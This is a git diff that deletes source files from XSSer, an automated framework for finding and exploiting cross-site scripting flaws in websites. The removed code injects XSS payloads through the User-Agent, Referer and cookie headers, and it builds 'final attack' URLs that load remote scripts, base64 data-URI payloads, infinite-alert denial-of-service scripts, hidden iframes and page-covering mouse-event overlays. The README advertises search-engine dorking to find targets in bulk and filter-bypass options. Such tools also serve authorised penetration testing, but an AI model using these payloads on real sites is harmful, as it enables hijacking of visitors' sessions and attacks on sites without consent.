-        options = self.options
-        cookie = None
-        if 'PAYLOAD' in payload['payload']: # auto
-            if options.xsa:
-                hashing = self.generate_hash('xsa')
-                agent = payload['payload'].replace('PAYLOAD', hashing)
-                self._ongoing_attacks['xsa'] = hashing
-                self.xsa_injection = self.xsa_injection + 1
-            else:
-                if options.agent:
-                    agent = options.agent
-            if options.xsr:
-                hashing = self.generate_hash('xsr')
-                referer = payload['payload'].replace('PAYLOAD', hashing)
-                self._ongoing_attacks['xsr'] = hashing
-                self.xsr_injection = self.xsr_injection + 1
-            else:
-                if options.referer:
-                    referer = options.referer
-            if options.coo:
-                hashing = self.generate_hash('cookie')
-                cookie = payload['payload'].replace('PAYLOAD', hashing)
-                self._ongoing_attacks['cookie'] = hashing
-                self.coo_injection = self.coo_injection + 1
-        elif 'XSS' in payload['payload']: # manual
-            if options.xsa:
-                hashing = self.generate_hash('xsa')
-                agent = payload['payload'].replace('XSS', hashing)
-                self._ongoing_attacks['xsa'] = hashing
-                self.xsa_injection = self.xsa_injection + 1
-            else:
-                if options.agent:
-                    agent = options.agent
-            if options.xsr:
-                hashing = self.generate_hash('xsr')
-                referer = payload['payload'].replace('XSS', hashing)
-                self._ongoing_attacks['xsr'] = hashing
-                self.xsr_injection = self.xsr_injection + 1
-            else:
-                if options.referer:
-                    referer = options.referer
-            if options.coo:
-                hashing = self.generate_hash('cookie')
-                cookie = payload['payload'].replace('XSS', hashing)
-                self._ongoing_attacks['cookie'] = hashing
-                self.coo_injection = self.coo_injection + 1
-        elif '1' in payload['payload']: # manual
-            if options.xsa:
-                hashing = self.generate_numeric_hash()
-                agent = payload['payload'].replace('1', hashing)
-                self._ongoing_attacks['xsa'] = hashing
-                self.xsa_injection = self.xsa_injection + 1
-            else:
-                if options.agent:
-                    agent = options.agent
-            if options.xsr:
-                hashing = self.generate_numeric_hash()
-                referer = payload['payload'].replace('1', hashing)
-                self._ongoing_attacks['xsr'] = hashing
-                self.xsr_injection = self.xsr_injection + 1
-            else:
-                if options.referer:
-                    referer = options.referer
-            if options.coo:
-                hashing = self.generate_numeric_hash()
-                cookie = payload['payload'].replace('1', hashing)
-                self._ongoing_attacks['cookie'] = hashing
-                self.coo_injection = self.coo_injection + 1
-        else: # default
-            if options.xsa:
-                hashing = self.generate_hash('xsa')
-                agent = "<script>alert('" + hashing + "')</script>"
-                self._ongoing_attacks['xsa'] = hashing
-                self.xsa_injection = self.xsa_injection + 1
-            else:
-                if options.agent:
-                    agent = options.agent
-            if options.xsr:
-                hashing = self.generate_hash('xsr')
-                referer = "<script>alert('" + hashing + "')</script>"
-                self._ongoing_attacks['xsr'] = hashing
-                self.xsr_injection = self.xsr_injection + 1
-            else:
-                if options.referer:
-                    referer = options.referer
-            if options.coo:
-                hashing = self.generate_hash('cookie')
-                cookie = "<script>alert('" + hashing + "')</script>"
-                self._ongoing_attacks['cookie'] = hashing
-                self.coo_injection = self.coo_injection + 1
-        return agent, referer, cookie
-
-    def attack(self, urls, payloads, query_string):
-        """
-        Perform an attack on the given urls with the provided payloads and
-        query_string.
-        """
-        for url in urls:
-            if self.pool:
-                self.poll_workers()
-            else:
-                self.mothership.poll_workers()
-            if not self._landing:
-                self.attack_url(url, payloads, query_string)
-
-    def generate_real_attack_url(self, dest_url, description, method, hashing, query_string, payload, orig_url):
-        """
-        Generate a real attack url by using data from a successfull test.
-
-	This method also applies DOM stealth mechanisms.
-        """
-        user_attack_payload = payload['payload']
-        if self.options.finalpayload:
-            user_attack_payload = self.options.finalpayload
-        elif self.options.finalremote:
-            user_attack_payload = '<script src="' + self.options.finalremote + '"></script>'
-        elif self.options.finalpayload or self.options.finalremote and payload["browser"] == "[Data Control Protocol Injection]":
-            user_attack_payload = '<a href="data:text/html;base64,' + b64encode(self.options.finalpayload) + '></a>'
-        elif self.options.finalpayload or self.options.finalremote and payload["browser"] == "[Induced Injection]":
-            user_attack_payload = self.options.finalpayload
-        if self.options.dos:
-            user_attack_payload = '<script>for(;;)alert("You were XSSed!!");</script>'
-        if self.options.doss:
-            user_attack_payload = '<meta%20http-equiv="refresh"%20content="0;">'
-        if self.options.b64:
-            user_attack_payload = '<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4">'
-        if self.options.onm:
-            user_attack_payload = '"style="position:absolute;top:0;left:0;z-index:1000;width:3000px;height:3000px" onMouseMove="' + user_attack_payload
-        if self.options.ifr:
-            user_attack_payload = '<iframe src="' + user_attack_payload + '" width="0" height="0"></iframe>'
-		    
-        do_anchor_payload = self.options.anchor
-        anchor_data = None
-        attack_hash = None
-        if 'PAYLOAD' in payload['payload']:
-            if user_attack_payload == "":
-                attack_hash = self.generate_hash('final')
-                user_attack_payload = payload['payload']
-                user_attack_payload = payload['payload'].replace('PAYLOAD', attack_hash)
-            else:
-                user_attack_payload = payload['payload'].replace('PAYLOAD', user_attack_payload)
-        if 'XSS' in user_attack_payload:
-            attack_hash = self.generate_hash('final')
-            user_attack_payload = user_attack_payload.replace('XSS', attack_hash)
-        if do_anchor_payload:
-            dest_url, newhash = self.get_url_payload(orig_url, payload, query_string, user_attack_payload)
-            dest_url = dest_url.replace('?', '#')
-        else:
-            dest_url, newhash = self.get_url_payload(orig_url, payload, query_string, user_attack_payload)
-        if attack_hash:
-            self.final_attacks[attack_hash] = {'url':dest_url}
-        return dest_url
-
-    def token_arrived(self, attack_hash):
-        if not self.mothership:
-            # only the mothership calls on token arriving.
-            self.final_attack_callback(attack_hash)
-
-    def final_attack_callback(self, attack_hash):
-        if attack_hash in self.final_attacks:
-            dest_url = self.final_attacks[attack_hash]['url']
-            self.report('[*] Browser check:', dest_url)
-            for reporter in self._reporters:
-                reporter.add_checked(dest_url)
-            if self._reporter:
-                from twisted.internet import reactor
-                reactor.callFromThread(self._reporter.post, 'SUCCESS ' + dest_url)
-            self.final_attacks.pop(attack_hash)
-
-    def apply_postprocessing(self, dest_url, description, method, hashing, query_string, payload, orig_url):
-        real_attack_url = self.generate_real_attack_url(dest_url, description, method, hashing, query_string, payload, orig_url)
-        #generate_shorturls = self.options.shorturls
-        #if generate_shorturls:
-        #    shortener = ShortURLReservations(self.options.shorturls)
-        #    if self.options.finalpayload or self.options.finalremote or self.options.b64 or self.options.dos:
-        #        shorturl = shortener.process_url(real_attack_url)
-        #        self.report("[/] Shortered URL (Final Attack):", shorturl)
-        #    else:
-        #        shorturl = shortener.process_url(dest_url)
-        #        self.report("[/] Shortered URL (Injection):", shorturl)
-        return real_attack_url
-
-    def report(self, *args):
-        args = list(map(lambda s: str(s), args))
-        formatted = " ".join(args)
-        if not self.options.silent:
-            print(formatted)
-        for reporter in self._reporters:
-            reporter.post(formatted)
-
-    def print_results(self):
-        """
-        Print results from attack.
-        """
-        self.report('\n' + '='*75)
-        total_injections = len(self.hash_found) + len(self.hash_notfound)
-        if len(self.hash_found) + len(self.hash_notfound) == 0:
-            pass
-        else:
-            self.report("[*] Final Results:")
-            self.report('='*75 + '\n')
-            self.report("- Injections:", total_injections)
-            self.report("- Failed:", len(self.hash_notfound))
-            self.report("- Successful:", len(self.hash_found))
-            try:
-                _accur = len(self.hash_found) * 100 / total_injections
-            except ZeroDivisionError:
-                _accur = 0
-            self.report("- Accur: %s %%\n" % _accur)
-            if not len(self.hash_found) and self.hash_notfound:
-                self.report('='*75 + '\n')
-                pass
-            else:
-                self.report('='*75)
-                self.report("[*] List of possible XSS injections:")
-                self.report('='*75 + '\n')
-        for line in self.hash_found: 
-            attack_url = self.apply_postprocessing(line[0], line[1], line[2], line[3], line[4], line[5], line[6])
-            if self.options.fileoutput:
-                fout = open("XSSreport.raw", "a")
-            if line[2] == "xsr":
-                self.xsr_found = self.xsr_found + 1
-                xsr_vulnerable_host = [{"payload":str(line[4]), "target":str(line[6])}]  
-                if xsr_vulnerable_host[0]["payload"] == line[4] and xsr_vulnerable_host[0]["target"] == line[6] and self.xsr_found > 1:
-                    self.xsr_found = self.xsr_found - 1
-                    pass
-                else:
-                    self.report("[I] Target:", line[6])
-                    self.report("[+] Injection:",str(line[6])+"/"+str(line[4]), "[", Curl.referer, "]")
-                    self.report("[!] Special:", "This injection looks like a Cross Site Referer Scripting")
-                    self.report("[-] Method:", line[2])
-                    self.report('-'*50, "\n")
-                    if self.options.fileoutput:
-                        fout.write("\n" + "XSSer Security Report: " + str(datetime.datetime.now()) + "\n")
-                        fout.write("---------------------" + "\n")
-                        fout.write("[I] Target: " + line[6] + "\n")
-                        fout.write("[+] Injection: " + str(line[6])+"/"+str(line[4]) + "[" + str(Curl.referer) + "]" + "\n")
-                        fout.write("[!] Special: " + "This injections looks like a Cross Site Referer Scripting" + "\n")
-                        fout.write("[-] Method: " + line[2] + "\n" + '-'*50 +"\n")
-            elif line[2] == "xsa":
-                self.xsa_found = self.xsa_found + 1
-                xsa_vulnerable_host = [{"payload":str(line[4]), "target":str(line[6])}]
-                if xsa_vulnerable_host[0]["payload"] == line[4] and xsa_vulnerable_host[0]["target"] == line[6] and self.xsa_found > 1:
-                    self.xsa_found = self.xsa_found - 1
-                    pass
-                else:
-                    self.report("[I] Target:", line[6])
-                    self.report("[+] Injection:",str(line[6])+"/"+str(line[4]),
-                                "[",  Curl.agent, "]")
-                    self.report("[!] Special:", "This injection looks like a Cross Site Agent Scripting")
-                    self.report("[-] Method:", line[2])
-                    self.report('-'*50, "\n")
-                    if self.options.fileoutput:
-                        fout.write("\n" + "XSSer Security Report: " + str(datetime.datetime.now()) + "\n")
-                        fout.write("---------------------" + "\n")
-                        fout.write("[I] Target: " + line[6] + "\n")
-                        fout.write("[+] Injection: "+ str(line[6])+"/"+str(line[4]) + "[" + str(Curl.agent) + "]" + "\n")
-                        fout.write("[!] Special: " + "This injection looks like a Cross Site Agent Scripting " + "\n")
-                        fout.write("[-] Method: " + line[2] + "\n" + '-'*50 +"\n")
-            elif line[2] == "coo":
-                self.coo_found = self.coo_found + 1
-                coo_vulnerable_host = [{"payload":str(line[4]), "target":str(line[6])}]
-                if coo_vulnerable_host[0]["payload"] == line[4] and coo_vulnerable_host[0]["target"] == line[6] and self.coo_found > 1:
-                    self.coo_found = self.coo_found - 1
-                    pass
-                else:
-                    self.report("[I] Target:", line[6])
-                    self.report("[+] Injection:",str(line[6])+"/"+str(line[4]),"[",
-                                Curl.cookie, "]")
-                    self.report("[!] Special:", "This injection looks like a Cross Site Cookie Scripting")
-                    self.report("[-] Method:", line[2])
-                    self.report('-'*50, "\n")
-                    if self.options.fileoutput:
-                        fout.write("\n" + "XSSer Security Report: " + str(datetime.datetime.now()) + "\n")
-                        fout.write("---------------------" + "\n")
-                        fout.write("[I] Target: " + line[6] + "\n")
-                        fout.write("[+] Injection: "+ str(line[6])+"/"+str(line[4]) + "[" + str(Curl.cookie) + "]" + "\n")
-                        fout.write("[!] Special: " + "This injection looks like a Cross Site Cookie Scripting " + "\n")
-                        fout.write("[-] Method: " + line[2] + "\n" + '-'*50 +"\n")
-            elif line[1] == "[Data Control Protocol Injection]":
-                self.dcp_found = self.dcp_found + 1
-                self.report("[I] Target:", line[6])
-                self.report("[+] Injection:", str(line[6])+"/"+str(line[4]),
-                            "[", line[5]["payload"] , "]")
-                self.report("[!] Special:", "This injection looks like a Data Control Protocol flaw")
-                if self.options.finalpayload or self.options.finalremote:
-                    self.report("[*] Final Attack: ", attack_url)
-                else:
-                    self.report("[*] Final Attack: ", line[5]["payload"])
-                self.report("[-] Method: dcp")
-                self.report('-'*50, "\n")
-                if self.options.fileoutput:
-                    fout.write("\n" + "XSSer Security Report: " + str(datetime.datetime.now()) + "\n")
-                    fout.write("---------------------" + "\n")
-                    fout.write("[I] Target: " + line[6] + "\n")
-                    fout.write("[+] Injection: " + str(line[6]) + "/" + str(line[4]) + "[" + line[5]["payload"] + "]" + "\n")
-                    fout.write("[!] Special: " + "This injection looks like a Data Control Protocol flaw" + "\n")
-                    if self.options.finalpayload or self.options.finalremote:
-                        fout.write("[*] Final Attack: " + attack_url + "\n")
-                    else:
-                        fout.write("[*] Final Attack: " + line[5]["payload"] + "\n")
-                    fout.write("[-] Method: dcp" + "\n" + '-'*50 +"\n")
-            elif line[1] == "[Document Object Model Injection]":
-                self.dom_found = self.dom_found + 1 
-                self.report("[I] Target:", line[6])
-                self.report("[+] Injection:", str(line[0]))
-                self.report("[!] Special:", "This injection looks like a Document Object Model flaw")
-                if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64:
-                    self.report("[*] Final Attack: ", attack_url)
-                else:
-                    pass
-                self.report("[-] Method: dom")
-                self.report('-'*50, "\n")
-                if self.options.fileoutput:
-                    fout.write("\n" + "XSSer Security Report: " + str(datetime.datetime.now()) + "\n")
-                    fout.write("---------------------" + "\n")
-                    fout.write("[I] Target: " + line[6] + "\n") 
-                    fout.write("[+] Injection: " + str(line[0]) + "\n")
-                    fout.write("[!] Special: " + "This injection looks like a Document Object Model flaw" + "\n")
-                    if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64:
-                        fout.write("[*] Final Attack: " + attack_url + "\n")
-                    else:
-                        pass
-                    fout.write("[-] Method: dom" + "\n" + '-'*50 +"\n")
-
-            elif line[1] == "[Induced Injection]":
-                self.httpsr_found = self.httpsr_found +1
-                self.report("[I] Target:", line[6])
-                self.report("[+] Injection:", str(line[0]))
-                self.report("[!] Special:", "This injection looks like a HTTP Splitting Response")
-                if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64:
-                    self.report("[*] Final Attack: ", attack_url)
-                else:
-                    pass
-                self.report("[-] Method: ind")
-                self.report('-'*50, "\n")
-                if self.options.fileoutput:
-                    fout.write("\n" + "XSSer Security Report: " + str(datetime.datetime.now()) + "\n")
-                    fout.write("---------------------" + "\n")
-                    fout.write("[I] Target: " + line[6] + "\n")
-                    fout.write("[+] Injection: " + str(line[0]) + "\n")
-                    fout.write("[!] Special: " + "This injection looks like a HTTP Splitting Response" + "\n")
-                    if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64:
-                        fout.write("[*] Final Attack: " + attack_url + "\n")
-                    else:
-                        pass
-                    fout.write("[-] Method: ind" + "\n" + '-'*50 +"\n")
-            elif line[5]["browser"] == "[hashed_precheck_system]":    
-                self.false_positives = self.false_positives + 1
-                self.report("[I] Target:", line[6])
-                self.report("[+] Injection:", str(line[0]))
-                self.report("[!] Checker: This injection looks like a -false positive- result!. Verify it manually!")
-                self.report("[-] Method: hash")
-                self.report('-'*50, "\n")
-                if self.options.fileoutput:
-                    fout.write("\n" + "XSSer Security Report: " + str(datetime.datetime.now()) + "\n")
-                    fout.write("---------------------" + "\n")
-                    fout.write("[I] Target: " + line[6] + "\n")
-                    fout.write("[+] Injection: " + str(line[0]) + "\n")
-                    fout.write("[!] Checker: This injection looks like a -false positive- result!. Verify it manually!" + "\n")
-                    fout.write("[-] Method: hash" + "\n" + '-'*50 +"\n")
-            elif line[5]["browser"] == "[manual_injection]":
-                self.manual_found = self.manual_found + 1
-                self.report("[I] Target:", line[6])
-                self.report("[+] Injection:", str(line[0]))
-                self.report("[-] Method: manual")
-                self.report('-'*50, "\n")
-                if self.options.fileoutput:
-                    fout.write("\n" + "XSSer Security Report: " + str(datetime.datetime.now()) + "\n")
-                    fout.write("---------------------" + "\n")
-                    fout.write("[I] Target: " + line[6] + "\n")
-                    fout.write("[+] Injection: " + str(line[0]) + "\n")
-                    fout.write("[-] Method: manual" + "\n" + '-'*50 +"\n")
-            elif line[5]["browser"] == "[Heuristic test]":
-                if str(line[5]["payload"]).strip('XSS') == "\\" or str(line[5]["payload"]).strip('XSS') == "/" or str(line[5]["payload"]).strip('XSS') == ">" or str(line[5]["payload"]).strip('XSS') == "<" or str(line[5]["payload"]).strip('XSS') == ";" or str(line[5]["payload"]).strip('XSS') == "'" or str(line[5]["payload"]).strip('XSS') == '"' or str(line[5]["payload"]).strip('XSS') == "=":
-                    self.report("[I] Target:", line[6])
-                    self.report("[+] Parameter(s):", "[",
-                                str(line[5]["payload"]).strip('XSS') , "]")
-                    self.report("[!] Special:", "This parameter(s) looks like is NOT -completly- FILTERED on target code")
-                    self.report("[-] Method: heuristic")
-                    self.report('-'*50, "\n")
-                    if self.options.fileoutput:
-                        fout.write("\n" + "XSSer Security Report: " + str(datetime.datetime.now()) + "\n")
-                        fout.write("---------------------" + "\n")
-                        fout.write("[I] Target: " + line[6] + "\n")
-                        fout.write("[+] Parameter(s): " + "[" + str(line[5]["payload"]).strip('XSS') + "]" + "\n")
-                        fout.write("[!] Special: " + "This parameter(s) looks like is NOT -completly- FILTERED on target code" + "\n")
-                        fout.write("[-] Method: heuristic" + "\n" + '-'*50 +"\n")
-                else:
-                    pass
-            else:
-                self.auto_found = self.auto_found + 1
-                self.report("[I] Target:", line[6])
-                self.report("[+] Injection:", line[0])
-                if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64:
-                    self.report("[*] Final Attack: ", attack_url)
-                else:
-                    pass
-                self.report("[-] Method: xss")
-                self.report("[-] Browsers:", line[1],  "\n", '-'*50, "\n")
-                if self.options.fileoutput:
-                    fout.write("\n" + "XSSer Security Report: " + str(datetime.datetime.now()) + "\n")
-                    fout.write("---------------------" + "\n")
-                    fout.write("[I] Target: " + line[6] + "\n")
-                    fout.write("[+] Injection: " + line[0] + "\n")
-                    if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64:
-                        fout.write("[*] Final Attack: " +  attack_url + "\n")
-                    else:
-                        pass
-                    fout.write("[-] Method: xss" + "\n")
-                    fout.write("[-] Browsers: "+ line[1] +  "\n" + '-'*50 + "\n")
-
-            #if self.options.tweet:
-            #    self.report("[!] Trying to publish on: " + self.sn_service + "/" + self.sn_username)
-            #    if self.options.fileoutput:
-            #        fout.write("[!] Published on: " + self.sn_service + "/" + self.sn_username + "\n")
-            #        fout.write("="*75 + "\n")
-
-            #if self.options.launch_browser:
-            #    if self.options.dcp:
-            #        #XXX implement DCP autolauncher
-            #        self.report("\n[@] DCP autolauncher not implemented, yet. (http://docs.python.org/library/webbrowser.html)")
-            #        self.report("[!] Aborting all launching process!!. If you want to 'auto-launch' other results, try without --Dcp option\n")
-            #        self.report("[I] If you have some DCP success injections discovered, try to open -manually- these results in the website of your target. You will see that works! ;)\n")
-            #    else:
-            #        if attack_url == "":
-            #            pass
-            #        else:
-            #            self._webbrowser.open(attack_url)
-
-        # heuristic always with statistics
-        if self.options.heuristic:
-            self.options.statistics = True
-	# some statistics reports
-        if self.options.statistics:
-            # heuristic test results
-            if self.options.heuristic:
-                self.report('='*75)
-                self.report("[*] Heuristic:")
-                self.report('='*75)
-                self.report('-'*50)
-                self.report('  ', "    <not-filt>", "   <filtered>", "    =" , "    ASCII",
-                            "   +", "   UNE/HEX", "   +", "   DEC")
-                # semicolon results
-                heuris_semicolon_total_found = self.heuris_semicolon_notfound + self.heuris_une_semicolon_found + self.heuris_dec_semicolon_found
-                self.report('; ',   "       ", self.heuris_semicolon_found, "            ", heuris_semicolon_total_found, "               ",
-                            self.heuris_semicolon_notfound, "            ",
-                            self.heuris_une_semicolon_found, "           ",
-                            self.heuris_dec_semicolon_found)
-                # backslash results
-                heuris_backslash_total_found = self.heuris_backslash_notfound + self.heuris_une_backslash_found + self.heuris_dec_backslash_found
-                self.report('\\ ',  "       ", self.heuris_backslash_found, "            ", heuris_backslash_total_found, "               ",
-                            self.heuris_backslash_notfound, "            ",
-                            self.heuris_une_backslash_found, "           ",
-                            self.heuris_dec_backslash_found)
-                # slash results
-                heuris_slash_total_found = self.heuris_slash_notfound + self.heuris_une_slash_found + self.heuris_dec_slash_found
-                self.report("/ ",   "       ", self.heuris_slash_found, "            ",
-                            heuris_slash_total_found, "               ",
-                            self.heuris_slash_notfound, "            ",
-                            self.heuris_une_slash_found, "           ",
-                            self.heuris_dec_slash_found)
-                # minor results
-                heuris_minor_total_found = self.heuris_minor_notfound + self.heuris_une_minor_found + self.heuris_dec_minor_found
-                self.report("< ",   "       ", self.heuris_minor_found, "            ",
-                            heuris_minor_total_found, "               ",
-                            self.heuris_minor_notfound, "            ",
-                            self.heuris_une_minor_found, "           ",
-                            self.heuris_dec_minor_found)
-                # mayor results
-                heuris_mayor_total_found = self.heuris_mayor_notfound + self.heuris_une_mayor_found + self.heuris_dec_mayor_found
-                self.report("> ",   "       ", self.heuris_mayor_found, "            ",
-                            heuris_mayor_total_found, "               ",
-                            self.heuris_mayor_notfound, "            ",
-                            self.heuris_une_mayor_found, "           ",
-                            self.heuris_dec_mayor_found)
-                # doublecolon results
-                heuris_doublecolon_total_found = self.heuris_doublecolon_notfound + self.heuris_une_doublecolon_found + self.heuris_dec_doublecolon_found
-                self.report('" ',   "       ", self.heuris_doublecolon_found, "            ", heuris_doublecolon_total_found, "               ",
-                            self.heuris_doublecolon_notfound, "            ",
-                            self.heuris_une_doublecolon_found, "           ",
-                            self.heuris_dec_doublecolon_found)
-                # colon results
-                heuris_colon_total_found = self.heuris_colon_notfound + self.heuris_une_colon_found + self.heuris_dec_colon_found
-                self.report("' ",   "       ", self.heuris_colon_found, "            ",
-                            heuris_colon_total_found, "               ",
-                            self.heuris_colon_notfound, "            ",
-                            self.heuris_une_colon_found, "           ",
-                            self.heuris_dec_colon_found)
-                # equal results
-                heuris_equal_total_found = self.heuris_equal_notfound + self.heuris_une_equal_found + self.heuris_dec_equal_found
-                self.report("= ",   "       ", self.heuris_equal_found, "            ",
-                            heuris_equal_total_found, "               ",
-                            self.heuris_equal_notfound, "            ",
-                            self.heuris_une_equal_found, "           ",
-                            self.heuris_dec_equal_found)
-                self.report('-'*70)
-                total_heuris_found = heuris_semicolon_total_found + heuris_backslash_total_found + heuris_slash_total_found + heuris_minor_total_found + heuris_mayor_total_found + heuris_doublecolon_total_found + heuris_colon_total_found + heuris_equal_total_found
-                
-                total_heuris_params = total_heuris_found + self.heuris_semicolon_found + self.heuris_backslash_found + self.heuris_slash_found + self.heuris_minor_found + self.heuris_mayor_found + self.heuris_doublecolon_found + self.heuris_colon_found + self.heuris_equal_found
-                try:
-                    _accur = total_heuris_found * 100 / total_heuris_params
-                except ZeroDivisionError:
-                    _accur = 0
-                self.report('Target(s) Filtering Accur: %s %%' % _accur)
-                self.report('-'*70)
-            # statistics block
-            if len(self.hash_found) + len(self.hash_notfound) == 0:
-                pass
-            else:
-                self.report('='*75)
-                self.report("[*] Statistic:")
-                self.report('='*75)
-                test_time = datetime.datetime.now() - self.time
-                self.report('-'*50)
-                self.report("Test Time Duration: ", test_time)
-                self.report('-'*50  )
-                total_connections = self.success_connection + self.not_connection + self.forwarded_connection + self.other_connection
-                self.report("Total Connections:", total_connections)
-                self.report('-'*25)
-                self.report("200-OK:" , self.success_connection , "|",  "404:" ,
-                            self.not_connection , "|" , "503:" ,
-                            self.forwarded_connection , "|" , "Others:",
-                            self.other_connection)
-                try:
-                    _accur = self.success_connection * 100 / total_connections
-                except ZeroDivisionError:
-                    _accur = 0
-                self.report("Connec: %s %%" % _accur)
-                self.report('-'*50)
-                total_payloads = self.check_positives + self.manual_injection + self.auto_injection + self.dcp_injection + self.dom_injection + self.xsa_injection + self.xsr_injection + self.coo_injection 
-                self.report("Total Payloads:", total_payloads)
-                self.report('-'*25)
-                self.report("Checker:", self.check_positives,  "|", "Manual:",
-                            self.manual_injection, "|" , "Auto:" ,
-                            self.auto_injection ,"|", "DCP:",
-                            self.dcp_injection, "|", "DOM:", self.dom_injection,
-                            "|", "Induced:", self.httpsr_injection, "|" , "XSR:",
-                            self.xsr_injection, "|", "XSA:",
-                            self.xsa_injection , "|", "COO:",
-                            self.coo_injection)
-                self.report('-'*50)
-                self.report("Total Injections:" , 
-                            len(self.hash_notfound) + len(self.hash_found))
-                self.report('-'*25)
-                self.report("Failed:" , len(self.hash_notfound), "|",
-                            "Successful:" , len(self.hash_found))
-                try:
-                    _accur = len(self.hash_found) * 100 / total_injections
-                except ZeroDivisionError:
-                    _accur = 0
-                self.report("Accur : %s %%" % _accur)
-                self.report('-'*25)
-                total_discovered = self.false_positives + self.manual_found + self.auto_found + self.dcp_found + self.dom_found + self.xsr_found + self.xsa_found + self.coo_found
-                self.report("Total Discovered:", total_discovered)
-                self.report('-'*25)
-                self.report("Checker:", self.false_positives, "|",
-                            "Manual:",self.manual_found, "|", "Auto:",
-                            self.auto_found, "|", "DCP:", self.dcp_found,
-                            "|", "DOM:", self.dom_found, "|", "Induced:",
-                            self.httpsr_found, "|" , "XSR:", self.xsr_found,
-                            "|", "XSA:", self.xsa_found, "|", "COO:",
-                            self.coo_found)
-                self.report('-'*50)
-                self.report("False positives:", self.false_positives, "|",
-                            "Vulnerables:",
-                            total_discovered - self.false_positives)
-                self.report('-'*25)
-	        # efficiency ranking:
-	        # algor= vulnerables + false positives - failed * extras
-                mana = 0
-                if self.hash_found > 3:
-                    mana = mana + 4500
-                if self.hash_found == 1:
-                    mana = mana + 500
-                if self.options.reversecheck:
-                    mana = mana + 200
-                if total_payloads > 100:
-                    mana = mana + 150
-                if not self.options.xsser_gtk:
-                    mana = mana + 125
-                if self.options.discode:
-                    mana = mana + 100
-                if self.options.proxy:
-                    mana = mana + 100
-                if self.options.threads > 9:
-                    mana = mana + 100
-                if self.options.heuristic:
-                    mana = mana + 100
-                if self.options.finalpayload or self.options.finalremote:
-                    mana = mana + 100
-                if self.options.script:
-                    mana = mana + 100
-                if self.options.Cem or self.options.Doo:
-                    mana = mana + 75
-                if self.options.heuristic:
-                    mana = mana + 50
-                if self.options.script and not self.options.fuzz:
-                    mana = mana + 25
-                if self.options.followred and self.options.fli:
-                    mana = mana + 25
-                if self.options.wizard:
-                    mana = mana + 25
-                if self.options.dcp:
-                    mana = mana + 25
-                if self.options.hash:
-                    mana = mana + 10
-                mana = (len(self.hash_found) * mana) + mana -4500
-                # enjoy it :)
-                self.report("Mana:", mana)
-                self.report("-"*50)
-
-        c = Curl()
-        if not len(self.hash_found) and self.hash_notfound:
-            if self.options.hash:
-                self.report("[!] Checker: looks like your target doesn't repeat code received.\n")
-                if self.options.fuzz or self.options.dcp or self.options.script:
-                    self.report("[I] Could not find any vulnerability!. Try another combination or hack it -manually- :)\n")
-            else:
-                self.report("[I] Could not find any vulnerability!. Try another combination or hack it -manually- :)\n")
-            self.report('='*75 + '\n')
-            if self.options.fileoutput:
-                fout = open("XSSreport.raw", "a")
-                fout.write("\n" + "XSSer Security Report: " + str(datetime.datetime.now()) + "\n")
-                fout.write("---------------------" + "\n")
-                fout.write("[!] Not reported 'positive' results for: \n" + "[-] " + str('\n[-] '.join([u[0] for u in self.hash_notfound])) + "\n")
-                fout.write("="*75 + "\n")
-                fout.close()
-        else:
-            # some exits and info for some bad situations:
-            if len(self.hash_found) + len(self.hash_notfound) == 0 and not Exception:
-                self.report("\nXSSer cannot send data :( ... maybe is -something- blocking our connections!?\n")
-            if len(self.hash_found) + len(self.hash_notfound) == 0 and self.options.crawling:
-                self.report("\n[Error] Crawlering system is not receiving feedback... Aborting! :(\n")
-
-        # print results to xml file
-        if self.options.filexml:
-            xml_report_results = xml_reporting(self)
-            try:
-                xml_report_results.print_xml_results(self.options.filexml)
-            except:
-                return
-
-if __name__ == "__main__":
-    app = xsser()
-    options = app.create_options()
-    if options:
-        app.set_options(options)
-        app.run()
-    app.land(True)
diff --git a/xsser/doc/AUTHOR b/xsser/doc/AUTHOR
deleted file mode 100644
index 8225dad..0000000
--- a/xsser/doc/AUTHOR
+++ /dev/null
@@ -1,17 +0,0 @@
-========================
-
-    nick: psy (epsylon) 
-  
-    email: <epsylon@riseup.net> 
-
-=======================
-
-    web: https://03c8.net
-
-    code: https://github.com/epsylon
-
-=======================
-
-    btc: 19aXfJtoYJUoXEZtjNwsah2JKN9CK5Pcjw
-
-========================
diff --git a/xsser/doc/README b/xsser/doc/README
deleted file mode 100644
index e0861a0..0000000
--- a/xsser/doc/README
+++ /dev/null
@@ -1,171 +0,0 @@
-================================================================
-Introduction:
-==============================
-
-Cross Site "Scripter" is an automatic -framework- to detect, exploit and report XSS vulnerabilities in web-based applications.
-
-It contains several options to try to bypass certain filters, and various special techniques of code injection.
-
-================================================================
-Options and features:
-==============================
- 
-xsser [OPTIONS] [--all <url> |-u <url> |-i <file> |-d <dork> (options)|-l ] [-g <get> |-p <post> |-c <crawl> (options)]
-[Request(s)] [Checker(s)] [Vector(s)] [Anti-antiXSS/IDS] [Bypasser(s)] [Technique(s)] [Final Injection(s)] [Reporting] {Miscellaneous}
-
-Cross Site "Scripter" is an automatic -framework- to detect, exploit and
-report XSS vulnerabilities in web-based applications.
-
-Options:
-  --version             show program's version number and exit
-  -h, --help            show this help message and exit
-  -s, --statistics      show advanced statistics output results
-  -v, --verbose         active verbose mode output results
-  --gtk                 launch XSSer GTK Interface
-  --wizard              start Wizard Helper!
-
-  *Special Features*:
-    You can set Vector(s) and Bypasser(s) to build complex scripts for XSS
-    code embedded. XST allows you to discover if target is vulnerable to
-    'Cross Site Tracing' [CAPEC-107]:
-
-    --imx=IMX           IMX - Create an image with XSS (--imx image.png)
-    --fla=FLASH         FLA - Create a flash movie with XSS (--fla movie.swf)
-    --xst=XST           XST - Cross Site Tracing (--xst http(s)://host.com)
-
-  *Select Target(s)*:
-    At least one of these options must to be specified to set the source
-    to get target(s) urls from:
-
-    --all=TARGET        Automatically audit an entire target
-    -u URL, --url=URL   Enter target to audit
-    -i READFILE         Read target(s) urls from file
-    -d DORK             Search target(s) using a query (ex: 'news.php?id=')
-    -l                  Search from a list of 'dorks'
-    --De=DORK_ENGINE    Use this search engine (default: yahoo)
-    --Da                Search massively using all search engines
-
